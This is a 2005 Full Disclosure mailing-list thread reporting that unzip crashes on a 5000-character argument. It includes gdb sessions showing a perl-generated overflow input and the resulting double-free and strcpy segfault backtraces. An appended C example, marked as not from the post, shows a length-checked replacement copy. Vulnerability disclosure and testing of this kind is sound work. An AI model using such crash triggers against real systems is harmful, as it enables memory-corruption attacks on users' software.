Full Disclosure mailing list archives

Re: Unzip *ALL* versions ;))


From: Rodrigo Barbosa <rodrigob () suespammers org>
Date: Mon, 19 Dec 2005 15:07:53 -0200

On Mon, Dec 19, 2005 at 05:27:15PM +0100, Joachim Schipper wrote:
> On Mon, Dec 19, 2005 at 12:06:07PM +0000, c0ntex wrote:
>> Just to add to the pot, this little bug has been there a long time,
>> mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
>> rather large files?
>>
>> ;)
>>
>> [c0ntex@linuxbox tmp]$ gdb -q unzip
>> (no debugging symbols found)...Using host libthread_db library
>> "/lib/tls/libthread_db.so.1".
>> (gdb) r `perl -e 'print "A" x 5000'`
>> Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
>> Reading symbols from shared object read from target memory...(no
>> debugging symbols found)...done.
>> Loaded system supplied DSO at 0xffffe000
>> (no debugging symbols found)...(no debugging symbols found)...unzip:
>> cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>
>> [snip]
>>
>> AAAAAAAAAAAAAA.ZIP.
>> *** glibc detected *** double free or corruption: 0x08075008 ***
>>
>> Program received signal SIGABRT, Aborted.
>> 0xffffe410 in __kernel_vsyscall ()
>> (gdb) bt
>> #0  0xffffe410 in __kernel_vsyscall ()
>> #1  0x002a2955 in raise () from /lib/tls/libc.so.6
>> #2  0x002a4319 in abort () from /lib/tls/libc.so.6
>> #3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
>> #4  0x002dc4ba in free () from /lib/tls/libc.so.6
>> #5  0x080543a6 in ?? ()
>> #6  0x08075008 in ?? ()
>> #7  0x00000005 in ?? ()
>> #8  0x00000000 in ?? ()
>
> I cannot reproduce this, either with "A" x 5000 or "A" x 20000. I tested
> unzip-5.52 on Linux/i386-2.6 and OpenBSD/i386-3.8, and saw no error.

Got a nasty explosion here. CentOS 4.2, Unzip-5.51:

(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x00197956 in strcpy () from /lib/tls/libc.so.6

Best Regards,

-- 
Rodrigo Barbosa <rodrigob () suespammers org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
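
Added example, not part of the original post and not unzip's source code: a SIGSEGV inside strcpy() on a 5000-byte argument, as reported above, is what an unchecked copy of a command-line filename into a fixed-size buffer produces. The sketch below shows the length-checked alternative; the function name `build_archive_name`, the 1024-byte buffer size and the sample inputs are assumptions made for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the example; not a constant taken from unzip. */
#define ARCHIVE_NAME_MAX 1024

/*
 * Build "<arg><suffix>" (e.g. the ".ZIP" fallback name seen in the error
 * message above) in out[outsz]. Returns 0 on success. Returns -1 and sets
 * errno to ENAMETOOLONG when the result, including its NUL terminator,
 * does not fit; out is then left as an empty string and is never overrun.
 */
int build_archive_name(char *out, size_t outsz,
                       const char *arg, const char *suffix)
{
    size_t alen, slen;

    if (out == NULL || outsz == 0 || arg == NULL || suffix == NULL) {
        errno = EINVAL;
        return -1;
    }
    alen = strlen(arg);
    slen = strlen(suffix);
    /* Written as two comparisons so alen + slen + 1 is never computed
     * and cannot wrap around size_t. */
    if (alen >= outsz || slen >= outsz - alen) {
        out[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, arg, alen);
    memcpy(out + alen, suffix, slen + 1);   /* copies the terminator too */
    return 0;
}

int main(void)
{
    char name[ARCHIVE_NAME_MAX];
    char longarg[5001];                     /* constructed: "A" x 5000 */

    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';
    if (build_archive_name(name, sizeof name, longarg, ".ZIP") != 0)
        fprintf(stderr, "argument rejected: %s\n", strerror(errno));
    if (build_archive_name(name, sizeof name, "backup", ".ZIP") == 0)
        printf("candidate: %s\n", name);
    return 0;
}
```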
